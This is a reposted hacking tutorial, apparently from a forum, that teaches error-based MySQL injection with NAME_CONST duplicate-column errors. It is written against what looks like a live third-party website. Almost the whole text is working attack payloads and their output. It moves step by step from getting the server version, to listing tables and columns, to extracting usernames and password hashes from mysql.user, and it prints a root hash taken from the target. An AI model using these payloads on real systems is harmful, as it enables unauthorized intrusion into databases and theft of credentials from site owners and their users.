利用NAME_CONST注入-MYSQL高版本报错注入技巧

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
相关信息
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)
|---------------|
|     TEST      |
|               |
|---------------|
|       1       |
|               |
|---------------|
http://域名/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261'
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables
Let's try it out on my site..
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error:Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error...
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error:Duplicate column name '1
Now let's get the tables out this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here, if it does, we can go on and finish the job.
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error:Duplicate column name 'com_admanage
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error:Duplicate column name 'Host'
Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...
Code:
http://域名/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error:Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
免责声明：文章来自：h t t p : / / w w w . h a c k b a s e . c o m /Soft/html/9/18/2011/2011101021246.htm，文章内容仅代表原作者个人观点，与本站无关。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。